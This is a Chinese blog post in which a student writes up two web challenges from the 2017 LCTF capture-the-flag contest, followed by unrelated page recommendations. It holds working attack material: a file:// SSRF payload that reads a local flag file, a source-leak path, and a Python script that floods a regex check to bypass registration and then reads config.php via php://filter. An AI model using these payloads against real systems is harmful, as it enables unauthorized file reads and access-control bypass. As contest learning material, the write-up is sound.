2018-01-15

2017 LCTF 学习体会

1. web签到题:

用file协议可以读取本地文件

要绕过逻辑中对host的检查,需要用到curl命令,curl支持file://host/path, file://path 这两种形式,都会访问到本地文件

截断url后面拼接的/, GET请求,用?#都可以

Payload:

  file://www.baidu.com/etc/flag?

LCTF{1eTus_q14ndao_B4_387t439hg9342}

之前自己做的时候想到本地代理一般都是设置为127.0.0.1:8080, 试过之后发现不行,查询之后发现它只是本机的一个回送地址,不进行网络传输


2. 萌萌哒的报名系统:

这题提示给了IDE,从大佬的wp中知道PHP有款强大的IDE叫做PHPSTORM,它新建项目时会产生一个.idea文件夹,payload: http://123.206.120.239/.idea/ 访问文件夹

发现有一个xdcms2333.zip, payload: http://123.206.120.239/xdcms2333.zip? 下载这个压缩包,打开得到整站源码:

查看了login.php和member.php 没有发现什么有用的东西,看register.php 时, 有以下两处关键代码:

$admin = "xdsec"."###".str_shuffle('you_are_the_member_of_xdsec_here_is_your_flag');

preg_match('/^(xdsec)((?:###|\w)+)$/i', $code, $matches);

如果匹配了$matches[0]=$admin,就可以把xdsec注册到identities表中去,这样我们就可以绕过member.php中的:

$sth->execute([':username' => $_SESSION['username']]);

    if ($sth->fetch()[0] === 'GUEST') {

        $_SESSION['is_guest'] = true;

}

  但是str_shuffle是不可预测的。所以要另找方法,很多人用的非预期解—条件竞争,如果在identities表中没有username这一行数据,那么取出来$sth->fetch[0]的结果就为null,可绕过第一层,所以可以用Python多线程注册用户,(没试过)。

其实正解是通过pre_match函数的资源消耗来绕过,喂给pre_match一个很长的字符串,会导致pre_match消耗大量资源从而导致后面的php不会执行。

脚本如下:

# !/usr/bin/env python

# -*- coding: utf-8 -*-

import requests

import threading

import re

import os

__author__ = "hahahha"


s = requests.session()


url = 'http://123.206.120.239/'

url1 = url+'register.php'

url2 = url+'login.php'

url3 = url+'member.php?file=php://filter/resource=config.php'


headers = {'User-Agent':'Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0'}


def register():

    data = {

        'username':'Asdfgh',

        'password':'123456',

        'code':'xdsec###'+'A'*1000000

        }

    try:

        res1=s.post(url1,headers=headers,data=data,timeout=10)

        print (res1.text)

    except:

        pass


def login():

    data = {

        'username':'Asdfgh',

        'password':'123456'

        }

    res2=s.post(url2,headers=headers,data=data)

    print (res2.text)


def member():

    res3 = s.get(url3,headers=headers)

    print (res3.text)


if __name__=='__main__':

    register()

    login()

    member()


脚本是看别人的,在这里也总结一下,一般的应该怎么写:

Requests是Python的第三方库,需要自己下载安装才能使用,这次用到的是web提交的基本使用,requsets.session()是一个会话,requests.session().post(url,headers,data,timeout), 其中headers只把User-Agent 添加进去就行了,不过要添加完整,我做的时候就复制少了,所以一直出不来,print(res.txet)打印的内容要规范一点,最好别用(res.content)。

经过这道题,我觉得我要学的东西还很多,PHP代码审计,正则表达式是很重要的,等Python的老师讲有点等不及了,先自己看看吧,再实践实践,Python也用得不是很熟。加油吧,少年!


注:自己实在是太菜,复现都只能做出两道题来,唉唉唉!最近刚半期考完,数电成绩很不理想,英语六级也快要考了,花在这方面的时间可能会要少一点。

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 214,588评论 6 496
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 91,456评论 3 389
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 160,146评论 0 350
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 57,387评论 1 288
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 66,481评论 6 386
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 50,510评论 1 293
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 39,522评论 3 414
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 38,296评论 0 270
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 44,745评论 1 307
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 37,039评论 2 330
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 39,202评论 1 343
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 34,901评论 5 338
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,538评论 3 322
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 31,165评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,415评论 1 268
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 47,081评论 2 365
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 44,085评论 2 352

推荐阅读更多精彩内容

  • Spring Cloud为开发人员提供了快速构建分布式系统中一些常见模式的工具(例如配置管理,服务发现,断路器,智...
    卡卡罗2017阅读 134,646评论 18 139
  • 自己做dede的开发时间也比较长了,基本上常用的函数都知道在哪个文件里面,但是时间一长,也有点模糊了,俗话说:好记...
    大刘的英语世界阅读 1,682评论 1 9
  • 字典:当索引不好用时 字典是一种通过名字引用值的数据结构。这种结构类型称为映射。字典是Python中唯一內建的映射...
    mydre阅读 503评论 0 0
  • Linux常用命令大全 最近都在和Linux打交道,这方面基础比较薄弱的我只好买了本鸟哥的书看看,感觉还不错。我觉...
    有你就行阅读 220评论 0 0
  • 看了女博士的嘘嘘,哦不,是唏嘘。。她都唏嘘了,我就不必了。 功利这座桥上,名利这个场里,进来后,大部分人都会失望的...
    Janesha阅读 291评论 0 0